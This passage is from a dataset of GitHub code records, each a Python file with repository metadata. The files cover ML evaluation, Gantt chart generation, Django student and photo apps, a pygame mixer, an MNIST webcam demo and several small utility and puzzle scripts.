model.transition_model(pred_state, actions[i])\n pred_state = pred_state + pred_trans\n\n # pred_state: [100, |O|, D]\n # states: [10, 100, |O|, D]\n # pred_state_flat: [100, X]\n # states_flat: [10, 100, X]\n pred_state_flat = pred_state.reshape((pred_state.size(0), pred_state.size(1) * pred_state.size(2)))\n states_flat = states.reshape((states.size(0), states.size(1), states.size(2) * states.size(3)))\n\n # dist_matrix: [10, 100]\n dist_matrix = (states_flat - pred_state_flat[None]).pow(2).sum(2)\n indices = torch.argmin(dist_matrix, dim=0)\n correct = indices == args_eval.num_steps\n\n # check for duplicates\n if args_eval.dedup:\n equal_mask = torch.all(state_ids[indices, list(range(100))] == state_ids[args_eval.num_steps], dim=1)\n correct = correct + equal_mask\n\n # hits\n hits_list.append(correct.float().mean().item())\n\n hits = 
np.mean(hits_list)\n\n print('Hits @ 1: {}'.format(hits))\n\n return hits, 0.\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--save-folder', type=str,\n default='checkpoints',\n help='Path to checkpoints.')\n parser.add_argument('--num-steps', type=int, default=1,\n help='Number of prediction steps to evaluate.')\n parser.add_argument('--dataset', type=str,\n default='data/shapes_eval.h5',\n help='Dataset string.')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='Disable CUDA training.')\n parser.add_argument('--no-transition', default=False, action='store_true')\n parser.add_argument('--dedup', default=False, action='store_true')\n\n args_eval = parser.parse_args()\n\n meta_file = os.path.join(args_eval.save_folder, 'metadata.pkl')\n model_file = os.path.join(args_eval.save_folder, 'model.pt')\n\n args = pickle.load(open(meta_file, 'rb'))['args']\n\n args.cuda = not args_eval.no_cuda and torch.cuda.is_available()\n args.batch_size = 100\n args.dataset = args_eval.dataset\n args.seed = 0\n\n evaluate(args, args_eval, model_file)\n","repo_name":"ondrejbiza/negative-sampling-icml-21","sub_path":"ns/scr/eval_ids_b_inep.py","file_name":"eval_ids_b_inep.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"37646915150","text":"from datetime import datetime\nfrom io import StringIO\n\nfrom .utility import write_output, format_latex\n\n__all__ = [\"gantt\", \"gantt_embedded\"]\n\n# Milestones with these prefixes are included when generating Gantt charts.\n# Note that some are not DM milestones, but are included for context.\nGANTT_MILESTONES = [\n \"LDM\",\n \"LSST-1200\",\n \"T&SC-1100-0900\",\n # \"COMC-1264\",\n # \"CAMM6995\", Dropped following LCR-1288.\n \"LSST-1220\",\n # \"T&SC-1150-0600\",\n \"LSST-1510\",\n \"LSST-1513\",\n # \"COMC-1664\",\n \"LSST-1520\",\n \"LSST-1540\",\n \"LSST-1560\",\n \"LSST-1620\",\n]\n\nGANTT_PREAMBLE_EMBEDDED = \"\"\"\n\\\\begin{ganttchart}[\n expand chart=\\\\textwidth,\n title label font=\\\\sffamily\\\\bfseries,\n milestone label font=\\\\scriptsize,\n progress label text={#1},\n milestone progress label node/.append style={right=1.4cm},\n y unit chart=0.4cm,\n y unit title=0.7cm\n]{1}{149}\n \\\\gantttitle{}{6} \\\\gantttitle{2018}{12} \\\\gantttitle{2019}{12}\n \\\\gantttitle{2020}{12} \\\\gantttitle{2021}{12} \\\\gantttitle{2022}{12}\n \\\\gantttitle{2023}{12} \\\\gantttitle{2024}{12} \\\\gantttitle{2025}{12}\n \\\\gantttitle{Operations}{47} \\\\\n \\\\ganttnewline\\n\n\"\"\"\n\nGANTT_POSTAMBLE_EMBEDDED = \"\"\"\n\\\\end{ganttchart}\n\"\"\"\n\nGANTT_PREAMBLE_STANDALONE = \"\"\"\n\\\\documentclass{article}\n\\\\usepackage[\n paperwidth=37cm,\n paperheight=28cm, % Manually tweaked to fit chart\n left=0mm,\n top=0mm,\n bottom=0mm,\n right=0mm,\n noheadfoot,\n marginparwidth=0pt,\n includemp=false\n]{geometry}\n\\\\usepackage{pgfgantt}\n\\\\begin{document}\n\\\\begin{center}\n\\\\begin{ganttchart}[\n% vgrid, % disabled for aesthetic reasons\n% hgrid, % disabled for aesthetic reasons\n expand chart=0.98\\\\textwidth,\n title label font=\\\\sffamily\\\\bfseries,\n milestone label font=\\\\sffamily\\\\bfseries,\n progress label text={#1},\n milestone progress label node/.append style={right=2.2cm},\n milestone progress label font=\\\\sffamily,\n y unit chart=0.55cm,\n y unit title=0.8cm\n]{1}{126}\n \\\\gantttitle{}{6} \\\\gantttitle{2018}{12} \\\\gantttitle{2019}{12}\n 
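    % Column arithmetic for the standalone chart: the time axis {1}{126} =
    % 6 lead-in months (Jul-Dec 2017, matching start=datetime(2017, 7, 1)
    % below) + 8 calendar years x 12 + a 24-month "Operations" tail; the
    % embedded chart's {1}{149} differs only in its 47-month tail.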
\\\\gantttitle{2020}{12} \\\\gantttitle{2021}{12} \\\\gantttitle{2022}{12}\n \\\\gantttitle{2023}{12} \\\\gantttitle{2024}{12} \\\\gantttitle{2025}{12}\n \\\\gantttitle{Operations}{24} \\\\\n \\\\ganttnewline\\n\n\"\"\"\n\nGANTT_POSTAMBLE_STANDALONE = \"\"\"\n\\\\end{ganttchart}\n\\\\end{center}\n\\\\end{document}\n\"\"\"\n\n\ndef format_gantt(milestones, preamble, postamble, start=datetime(2017, 7, 1)):\n def get_month_number(start, date):\n # First month is month 1; all other months sequentially.\n return 1 + (date.year * 12 + date.month) - (start.year * 12 + start.month)\n\n def get_milestone_name(code):\n return code.lower().replace(\"-\", \"\").replace(\"&\", \"\")\n\n output = StringIO()\n output.write(preamble)\n\n for ms in sorted(milestones, key=lambda x: x.due):\n # A comma in the name causes a problem; escape with \\\\\n name = ms.short_name.replace(\",\", \"\\\\,\")\n output_string = (\n f\"\\\\ganttmilestone[name={get_milestone_name(ms.code)},\"\n f\"progress label text={name}\"\n f\"\\\\phantom{{#1}},progress=100]{{{ms.code}}}\"\n f\"{{{get_month_number(start, ms.due)}}} \\\\ganttnewline\"\n )\n output.write(format_latex(output_string))\n # format_latex() strips trailing newlines; add one for cosmetic reasons\n output.write(\"\\n\")\n\n for ms in sorted(milestones, key=lambda x: x.due):\n for succ in ms.successors:\n if succ in [milestone.code for milestone in milestones]:\n output.write(\n \"\\\\ganttlink{{{}}}{{{}}}\\n\".format(\n get_milestone_name(ms.code), get_milestone_name(succ)\n )\n )\n\n output.write(postamble)\n return output.getvalue()\n\n\ndef gantt_standalone(milestones):\n milestones = [\n ms\n for ms in milestones\n for gantt in GANTT_MILESTONES\n if ms.code.startswith(gantt)\n ]\n return format_gantt(\n sorted(milestones, key=lambda x: (x.due, x.code)),\n GANTT_PREAMBLE_STANDALONE,\n GANTT_POSTAMBLE_STANDALONE,\n )\n\n\ndef gantt_embedded(milestones):\n milestones = [\n ms\n for ms in milestones\n for gantt in GANTT_MILESTONES\n if ms.code.startswith(gantt)\n ]\n return format_gantt(\n sorted(milestones, key=lambda x: (x.due, x.code)),\n GANTT_PREAMBLE_EMBEDDED,\n GANTT_POSTAMBLE_EMBEDDED,\n )\n\n\ndef gantt(args, milestones):\n if args.embedded:\n tex_source = gantt_embedded(milestones)\n else:\n tex_source = gantt_standalone(milestones)\n write_output(args.output, tex_source)\n","repo_name":"lsst-dm/milestones","sub_path":"milestones/gantt.py","file_name":"gantt.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"13010482719","text":"points = []\nmaxx=0\nmaxy=9\nfor line in open(\"C:\\\\Users\\\\anant\\\\PythonProjects\\\\AdventOfCode\\\\day13\\\\inp13.txt\"):\n if line!='\\n':\n points.append(list(map(int,line.strip().split(\",\"))))\n maxx = max(maxx, points[-1][0])\n maxy = max(maxy, points[-1][1])\n else:\n break\nboard = [[\"1\" for i in range(maxx+1)] for j in range(maxy+1)]\nfor point in points:\n board[point[1]][point[0]]=\"#\"\ninst = \"x\"\nval = 655\n\nfor i in range(len(board)):\n for j in range(val+1):\n if board[i][len(board[0])-j-1] == \"#\":\n board[i][j] = board[i][len(board[0])-j-1]\nnew_board = []\nfor row in board:\n new_board.append(row[:val])\nboard = new_board\na = 0\nfor i in range(len(board)):\n 
a+=board[i].count(\"#\")\nprint(a)\n","repo_name":"OneBitPython/AdventOfCode","sub_path":"2021/day13/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24549377592","text":"from optparse import OptionParser\n\nfrom console.application import runGet, runView, runAppendSynonym\nfrom gui.application import run\n\n\ndef main():\n parser = OptionParser()\n parser.add_option(\"--get\",\n dest=\"get\",\n help=\"Get the statistic for the resource\")\n parser.add_option(\"--view\",\n dest=\"view\",\n help=\"View the statistic for the resource\")\n parser.add_option(\"--shortname\",\n dest=\"shortName\",\n help=\"Append short name for the resource\")\n parser.add_option(\"--fullname\",\n dest=\"fullName\",\n help=\"Append full name for the resource\")\n\n\n (options, _) = parser.parse_args()\n\n if options.get is not None:\n runGet(options.get)\n elif options.view is not None:\n runView(options.view)\n elif options.shortName is not None and options.fullName is not None:\n runAppendSynonym(options.shortName, options.fullName)\n else:\n run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AndrewZ1989/TagCounter","sub_path":"tagcounter/tagcounter.py","file_name":"tagcounter.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12097978405","text":"\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom photos.models import Image\nfrom photos.widgets import TableCheckboxSelectMultiple\n\nfrom tribes.forms import GroupForm\nfrom django.forms.models import ModelForm\n\n\nclass PhotoUploadForm(GroupForm):\n \n title = forms.CharField(required=False)\n \n class Meta:\n model = Image\n exclude = [\"member\", \"photoset\", \"title_slug\", \"effect\", \"crop_from\", 'group_content_type', 'group_object_id']\n \n def clean_title(self):\n if not self.cleaned_data[\"title\"]:\n self.cleaned_data[\"title\"] = self.cleaned_data[\"image\"].name\n return self.cleaned_data[\"title\"]\n \n def clean_image(self):\n if \"#\" in self.cleaned_data[\"image\"].name:\n raise forms.ValidationError(\n _(\"Image filename contains an invalid character: '#'. 
Please remove the character and try again.\"))\n return self.cleaned_data[\"image\"]\n \n def clean(self):\n self.check_group_membership()\n return super(PhotoUploadForm, self).clean()\n \n\n\n\nclass PhotoEditForm(ModelForm):\n \n class Meta:\n model = Image\n exclude = [\n \"member\",\n \"photoset\",\n \"title_slug\",\n \"effect\",\n \"crop_from\",\n \"image\",\n 'group_content_type', 'group_object_id',\n ]\n \n def __init__(self, user=None, *args, **kwargs):\n self.user = user\n super(PhotoEditForm, self).__init__(*args, **kwargs)\n\nclass FacebookPhotosForm(forms.Form):\n \"\"\"\n Maybe used for album ids (aids) or picture ids (pids)\n \"\"\"\n \n selected_ids = forms.MultipleChoiceField(required=False, label='')\n \n def __init__(self, objects=(), initial=[], *args, **kwargs):\n super(FacebookPhotosForm, self).__init__(*args, **kwargs)\n # set choice field's choices dynamically\n choices = [(obj['aid'], obj['name']) for obj in objects]\n thumbs = [obj['thumb_url'] for obj in objects]\n self.fields['selected_ids'].choices = choices \n self.fields['selected_ids'].initial = initial \n self.fields['selected_ids'].widget = TableCheckboxSelectMultiple(choices=choices, thumb_urls=thumbs, cols_count=3)","repo_name":"oppian/oserver","sub_path":"apps/photos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13036495200","text":"from osgeo import gdal\n\nfileformat = \"NITF\"\ndriver = gdal.GetDriverByName(fileformat)\nmetadata = driver.GetMetadata()\nif metadata.get(gdal.DCAP_CREATE) == \"YES\":\n print(\"Driver {} supports Create() method.\".format(fileformat))\n\nif metadata.get(gdal.DCAP_CREATECOPY) == \"YES\":\n print(\"Driver {} supports CreateCopy() method.\".format(fileformat))\n\n\ndst_ds = driver.Create(\"blank.tif\", xsize=2345, ysize=3844,\n bands=8, eType=gdal.GDT_Byte)\n\n\ndst_ds = None\n","repo_name":"lamchunying/NITF_Files","sub_path":"blank.py","file_name":"blank.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27714980353","text":"# script to push repos to github\nfrom time import localtime, strftime\nimport os\nimport fire\nimport subprocess\n\n# vars\nname = os.environ['USER']\ntime = strftime(\"%Y-%m-%d %H:%M:%S\", localtime())\ndotLoc = '/home/{}/m/dot'.format(name)\nvimLoc = '/home/{}/m/vim'.format(name)\ndotList = [\n '/home/{}/.vimrc'.format(name),\n '/home/{}/.config/ion/initrc'.format(name),\n '/home/{}/.config/alacritty/alacritty.yml'.format(name),\n '/home/{}/.tmux.conf.local'.format(name),\n]\n\n\ndef sub(command, loc):\n p = subprocess.Popen(\n command,\n cwd=loc,\n stdout=subprocess.PIPE\n )\n for line in iter(p.stdout.readline, b''):\n print('>>> {}'.format(line.rstrip().decode('utf-8')))\n\n\ndef rsyncList(loc):\n return [[\n 'rsync',\n '-av',\n '-P',\n '--outbuf=L',\n '{}'.format(l),\n '{}'.format(loc)] for l in dotList]\n\n\ndef push(loc):\n sub(['git', 'add', '-A'], loc)\n sub(['git', 'commit', '-m', '\"{}\"'.format(time)], loc)\n sub(['git', 'push'], loc)\n\n\ndef dot():\n [sub(l, dotLoc) for l in rsyncList(dotLoc)]\n push(dotLoc)\n\n\ndef vim():\n push(vimLoc)\n\n\ndef all():\n dot()\n vim()\n\n\nif __name__ == '__main__':\n 
fire.Fire()\n","repo_name":"icew4ll/git","sub_path":"git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42486711952","text":"from logging.handlers import TimedRotatingFileHandler\nfrom sources.framework.common.logger.message_type import MessageType\nimport configparser\nimport logging\nimport os\n\n\nclass Logger:\n\n def __init__(self):\n self.logger = logging.getLogger(\"emsxapi\")\n self.config = configparser.ConfigParser()\n self.config.read(\"configs/logger.ini\")\n self.level = int(self.config['DEFAULT']['level'])\n self.log_dir = self.config['DEFAULT']['log_dir']\n self.when_to_rotate = self.config['DEFAULT']['when_to_rotate']\n self.backup_count = int(self.config['DEFAULT']['backup_count'])\n self.log_file_name = self.config['DEFAULT']['log_file_name']\n\n def use_timed_rotating_file_handler(self):\n \"\"\"\n\n \"\"\"\n if self.level is None:\n self.level = logging.INFO\n\n log_path = os.path.join(self.log_dir, self.log_file_name)\n\n main_formatter = logging.Formatter(\n fmt='%(asctime)s [%(module)s %(levelname)s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n console_handler = logging.StreamHandler()\n file_handler = TimedRotatingFileHandler(\n filename=log_path, when=self.when_to_rotate, backupCount=self.backup_count)\n\n for handler in [console_handler, file_handler]:\n handler.setFormatter(main_formatter)\n self.logger.addHandler(handler)\n self.logger.setLevel(self.level)\n\n def print(self, msg, msg_type):\n \"\"\"\n\n Args:\n msg ():\n msg_type ():\n \"\"\"\n if msg_type == MessageType.CRITICAL:\n self.logger.critical(msg)\n if msg_type == MessageType.ERROR:\n self.logger.error(msg)\n if msg_type == MessageType.WARNING:\n self.logger.warning(msg)\n if msg_type == MessageType.INFO:\n self.logger.info(msg)\n if msg_type == MessageType.DEBUG:\n self.logger.debug(msg)\n","repo_name":"FerGusMosca/MissisipiCapital_DayTradyingPlatform","sub_path":"day_trader/sources/framework/common/logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"772717858","text":"import matplotlib.pyplot as plt\nfrom math import sqrt, floor, ceil\nfrom matplotlib.transforms import Bbox\nimport pandas as pd\nimport numpy as np\n\ndef up_bound(t, n=256):\n result = 0\n try:\n result = n/(2 * sqrt((n-t)*t))\n except ValueError:\n pass\n except ZeroDivisionError:\n print('Error zero div with n=',n,', t=',t)\n return (9/2) * result\n\nif __name__ == '__main__':\n\n results = pd.read_csv('../final_new.csv').transpose()\n\n total = results.transpose().mean()\n total.plot(kind = 'bar', fc=(0,0,1,0.5))\n\n up_line = []\n for i in range(len(results.index)): \n max = results.iloc[i].max()\n min = results.iloc[i].min()\n \n plt.plot(i,max,'bo')\n plt.plot(i,min,'bo')\n #plt.vlines(i, min, max)\n std = results.iloc[i].std()\n mean = results.iloc[i].mean()\n plt.vlines(i, mean - std, mean + std)\n\n x = [i+0.25 for x in range(len(results.iloc[i]))]\n plt.plot(x,results.iloc[i],'-ok')\n\n t = int(results.index[i])\n up_line.append(up_bound(t))\n plt.plot(up_line, color = 'red')\n plt.title('All plots')\n\n plt.show() 
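[Editor's aside — assumed usage of the Logger class in the record above, not code from that repository; it presumes configs/logger.ini exists with the keys the constructor reads.]

from sources.framework.common.logger.message_type import MessageType

logger = Logger()                         # reads configs/logger.ini
logger.use_timed_rotating_file_handler()  # console + rotating file output
logger.print("strategy initialized", MessageType.INFO)
logger.print("order routing failed", MessageType.ERROR)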
","repo_name":"Teyal/TCC","sub_path":"grover-sat/crossover/src/print_results.py","file_name":"print_results.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41290743418","text":"class NamedDict(dict):\n def __getattr__(self, name):\n try:\n return self[name]\n except KeyError:\n raise AttributeError(f'No key: {name} in NamedDict. ')\n\n def __setattr__(self, key, value):\n self[key] = value\n\n\nenviron_config = NamedDict({\n 'reward_params': (15, 5, 1, 1),\n})\n","repo_name":"ASSANDHOLE/EMO-RL-UAV","sub_path":"gym_uav/env/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"42942567325","text":"from script.test_login import *\nfrom script.wwtest_SandBox import *\nfrom script.edtest_adddata import *\n\n\nif __name__ == '__main__':\n login=Login()\n chrome=login.test_login() #登录\n\n sanbox=CreateSandBox(chrome) #实例化沙盒类\n sanbox.test_createsandbox() #新建沙盒\n\n data=SandData(chrome)#实例化数据源\n data.test_adddata() #添加数据源","repo_name":"kongwd555/UI_test","sub_path":"script/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14051588219","text":"import csv, io\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.urls import reverse\n\nfrom ..models import Student, StudentGroup\n\n\n# imports a csv file with students for a specific group\ndef import_students_togroup(request):\n if request.method == 'POST':\n group_id = request.POST.get('group_id')\n group = StudentGroup.objects.get(id=group_id)\n csvfile = request.FILES['csvfile']\n if csvfile.name.endswith('.csv'):\n csvdata = csvfile.read().decode('utf-8')\n datastream = io.StringIO(csvdata)\n\n reader = csv.reader(datastream, delimiter=',', quotechar='\"')\n student_list = []\n for row in reader:\n student = Student(\n first_name = row[0],\n last_name = row[1],\n student_custom_id = row[2],\n student_group = group\n )\n student_list.append(student)\n if len(student_list) > 0:\n Student.objects.bulk_create(student_list)\n return HttpResponseRedirect(reverse('instructor:studentgroupdetails', args=(group_id,)))\n else:\n return HttpResponse('Only csv files are supported')\n else:\n raise Http404\n","repo_name":"robertdroptablestudents/sqlgrader","sub_path":"webui/instructor/views/imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"28419063646","text":"from mpi4py import MPI\nimport numpy as np\nimport mkl,time\n\n__all__=[]\n\nmkl.set_num_threads(1)\ncomm=MPI.Comm.Get_parent()\nvecs,lczs,indices=comm.recv(source=0,tag=0)\ndata=[]\nfor index,lanczos in zip(indices,lczs):\n stime=time.time()\n Q=np.zeros((vecs.shape[0],lanczos.maxiter),dtype=vecs.dtype)\n while lanczos.niter Node:\n if not node:\n return None\n\n hashmap = {\n node.val: Node(node.val)\n }\n\n # BFS\n queue = [node]\n visited = set()\n visited.add(node.val)\n\n while len(queue) > 0:\n visitedNode = queue.pop(0)\n visited.add(visitedNode.val)\n # print(\"Visited Node - \", visitedNode.val)\n\n if visitedNode.neighbors is None:\n continue\n\n for neighborNode in visitedNode.neighbors:\n if neighborNode.val not in 
visited:\n queue.append(neighborNode)\n visited.add(neighborNode.val)\n hashmap[neighborNode.val] = Node(neighborNode.val)\n\n if hashmap[visitedNode.val].neighbors is None:\n hashmap[visitedNode.val].neighbors = []\n hashmap[visitedNode.val].neighbors.append(hashmap[neighborNode.val])\n\n return hashmap[node.val]\n\n\nif __name__ == \"__main__\":\n pass","repo_name":"tahmid-tanzim/problem-solving","sub_path":"Trees_and_Graphs/clone-graph.py","file_name":"clone-graph.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"42559742845","text":"import os\nimport math\nimport pygame\nimport random\nfrom scripts import functions\n\n\nclass Mixer:\n \"\"\"Mixer is a class to handle all the music and sound of the game\"\"\"\n def __init__(self, path: str):\n\n # PROPERTIES\n self.path = os.path.dirname(path)\n self.music_path = functions.resource_path(f'{self.path}/audio/music')\n self.sound_path = functions.resource_path(f'{self.path}/audio/sounds')\n\n # SONGS AND SOUNDS\n self.volume = 1\n self.next_song = ''\n self.playing = False\n self.current_song = ''\n\n # LOAD SONGS\n self.songs = [\n functions.resource_path(f'{self.music_path}/{song}')\n for song in os.listdir(self.music_path)\n ]\n\n # LOAD SOUNDS\n self.sounds = {\n sound:pygame.mixer.Sound(functions.resource_path(f'{self.sound_path}/{sound}'))\n for sound in os.listdir(self.sound_path)\n }\n\n # EVENTS\n pygame.mixer.music.set_endevent(pygame.USEREVENT)\n\n def set_music_volume(self, volume: int) -> None:\n \"\"\"Sets the volumen of the music\"\"\"\n self.volume = volume/100\n pygame.mixer.music.set_volume(self.volume)\n \n def set_sound_volume(self, volume: int, play_sound: bool=True) -> None:\n \"\"\"Sets the volume of the sounds\"\"\"\n for sound in self.sounds.values():\n sound.set_volume(volume/100)\n if play_sound: self.play_sound('move.wav')\n\n def load_queue(self) -> None:\n \"\"\"Loads the next song in queue\"\"\"\n while True:\n song = random.choice(self.songs)\n if song != self.current_song: break\n pygame.mixer.music.queue(song)\n pygame.mixer.music.set_volume(self.volume)\n self.next_song = song\n \n def play(self, loops: int=0) -> None:\n \"\"\"Plays the songs\"\"\"\n self.playing = True\n pygame.mixer.music.load(self.current_song)\n pygame.mixer.music.set_volume(self.volume)\n pygame.mixer.music.play()\n \n def start(self, song=None) -> None:\n \"\"\"Inits the mixer\"\"\"\n if not song: song = random.choice(self.songs)\n self.current_song = song\n self.play()\n self.load_queue()\n\n def stop(self) -> None:\n \"\"\"Stops the mixer\"\"\"\n pygame.mixer.music.stop()\n \n def next(self) -> None:\n \"\"\"Loads the next song and updates the new\"\"\"\n self.current_song = self.next_song\n self.load_queue()\n self.play()\n\n def play_sound(self, sound: str) -> None:\n \"\"\"Plays a sound\"\"\"\n pygame.mixer.Sound.play(self.sounds[sound])\n \n def pause(self) -> None:\n \"\"\"Pauses the mixer\"\"\"\n self.playing = False\n pygame.mixer.music.pause()\n \n def unpause(self) -> None:\n \"\"\"Unpauses the mixer\"\"\"\n self.playing = True\n pygame.mixer.music.unpause()\n","repo_name":"TheCodingStudent/Star-Chess","sub_path":"audio/mixer.py","file_name":"mixer.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33177079157","text":"import cv2\nimport numpy\nimport h5py\nimport keras\nfrom keras.models import load_model\nimport 
numpy as np\nmodel = load_model('keras-mnist-model.h5')\n\ndef infer(crop):\n image = np.reshape(crop,(-1,28,28,1))\n result = model.predict(image)\n result = result[0]\n #result = list(map(int,result))\n print(result)\n \n\n\n###CODE\n\ncam = cv2.VideoCapture(0)\n\nwhile True:\n ret,frame = cam.read()\n key = cv2.waitKey(1)\n flip = cv2.flip(frame,1)\n cv2.rectangle(flip,(50,50),(250,250),(0,0,255),1)\n roi = flip[60:250,60:250] ## size taken is 190x190\n roi_gray = cv2.cvtColor(roi,cv2.COLOR_BGR2GRAY)\n # thresh = cv2.adaptiveThreshold(roi,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,11,2)\n _,thresh = cv2.threshold(roi_gray,120,255,cv2.THRESH_BINARY)\n crop = cv2.resize(thresh,(28,28))\n '''\n crop = cv2.imread('./mnist_dream_10.png',0)\n _,thresh2 = cv2.threshold(crop,120,255,cv2.THRESH_BINARY)\n crop = cv2.resize(crop,(28,28))\n cv2.imshow(\"crop\",crop)\n '''\n infer(crop)\n cv2.imshow(\"frame\",roi)\n cv2.imshow(\"roi\",roi_gray)\n\n if key == ord('x'):\n break\n\ncam.release()\ncv2.destroyAllWindows()\n","repo_name":"huzefasr/Real-Time-mnist","sub_path":"scan_text.py","file_name":"scan_text.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17498317495","text":"import ZConfig\n\n\ndef substitute(s, mapping):\n \"\"\"Interpolate variables from `mapping` into `s`.\"\"\"\n if \"$\" in s:\n result = ''\n rest = s\n while rest:\n p, name, namecase, rest = _split(rest)\n result += p\n if name:\n v = mapping.get(name)\n if v is None:\n raise ZConfig.SubstitutionReplacementError(s, namecase)\n result += v\n return result\n else:\n return s\n\n\ndef isname(s):\n \"\"\"Return True iff s is a valid substitution name.\"\"\"\n m = _name_match(s)\n if m:\n return m.group() == s\n else:\n return False\n\n\ndef _split(s):\n # Return a four tuple: prefix, name, namecase, suffix\n # - prefix is text that can be used literally in the result (may be '')\n # - name is a referenced name, or None\n # - namecase is the name with case preserved\n # - suffix is trailling text that may contain additional references\n # (may be '' or None)\n if \"$\" in s:\n i = s.find(\"$\")\n c = s[i+1:i+2]\n if c == \"\":\n raise ZConfig.SubstitutionSyntaxError(\n \"illegal lone '$' at end of source\")\n if c == \"$\":\n return s[:i+1], None, None, s[i+2:]\n prefix = s[:i]\n if c == \"{\":\n m = _name_match(s, i + 2)\n if not m:\n raise ZConfig.SubstitutionSyntaxError(\n \"'${' not followed by name\")\n name = m.group(0)\n i = m.end() + 1\n if not s.startswith(\"}\", i - 1):\n raise ZConfig.SubstitutionSyntaxError(\n \"'${%s' not followed by '}'\" % name)\n else:\n m = _name_match(s, i+1)\n if not m:\n raise ZConfig.SubstitutionSyntaxError(\n \"'$' not followed by '$' or name\")\n name = m.group(0)\n i = m.end()\n return prefix, name.lower(), name, s[i:]\n else:\n return s, None, None, None\n\n\nimport re\n_name_match = re.compile(r\"[a-zA-Z_][a-zA-Z0-9_]*\").match\ndel re\n","repo_name":"ActiveState/OpenKomodoIDE","sub_path":"contrib/twisted/ZopeInterface-3.1.0c1/Support/ZConfig/substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"72"} +{"seq_id":"34159865273","text":"\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, render\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import 
StudentSerializer\nfrom .forms import StudentForm, UserForm\nfrom .models import Student, Track\n# Create your views here.\n\n\ndef home(request):\n all_students = Student.objects.all()\n context = {'student_list': all_students}\n return render(request, 'djapp/home.html', context)\n\n\ndef show(request, st_id):\n st = Student.objects.get(id=st_id)\n context = {'st': st}\n return render(request, 'djApp/show.html', context)\n\n\ndef del_St(request, st_id):\n st = Student.objects.get(id=st_id)\n st.delete()\n return redirect('home')\n\n\ndef addStudent(request):\n if request.method == 'POST':\n st_form = StudentForm(request.POST)\n if st_form.is_valid():\n st_form.save()\n return redirect('home')\n st_form = StudentForm()\n context = {'form': st_form}\n return render(request, 'djApp/add-student.html', context)\n\n\ndef editStudent(request, st_id):\n student = Student.objects.get(id=st_id)\n st_form = StudentForm(instance=student)\n\n if request.method == 'POST':\n st_form = StudentForm(request.POST, instance=student)\n if st_form.is_valid():\n st_form.save()\n return redirect('home')\n context = {'form': st_form}\n return render(request, 'djApp/add-student.html', context)\n\n\ndef ListStudentDetails(request, st_id):\n st = Student.objects.get(id=st_id)\n context = {'st': st}\n return render(request, 'djApp/st-details.html', context)\n\n\n# rest_framework views.\n@api_view(['GET'])\ndef api_all_students(request):\n all_st = Student.objects.all()\n sr_serializer = StudentSerializer(all_st, many=True)\n return Response(sr_serializer.data)\n\n\n@api_view(['GET'])\ndef api_student_details(request, st_id):\n all_st = Student.objects.get(id=st_id)\n sr_serializer = StudentSerializer(all_st, many=False)\n return Response(sr_serializer.data)\n\n\n@api_view(['POST'])\ndef api_student_create(request):\n print(\",,,,,,,,,,,,,,\", request.data)\n sr_serializer = StudentSerializer(data=request.data)\n if sr_serializer.is_valid():\n sr_serializer.save()\n return redirect('api-list')\n\n\n@api_view(['POST'])\ndef api_student_edit(request, st_id):\n st = Student.objects.get(id=st_id)\n sr_serializer = StudentSerializer(instance=st, data=request.data)\n if sr_serializer.is_valid():\n sr_serializer.save()\n return redirect('api-list')\n\n\n@api_view(['DELETE'])\ndef api_student_delete(request, st_id):\n print(\",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\")\n st = Student.objects.get(id=st_id)\n print(st)\n st.delete()\n return Response('User 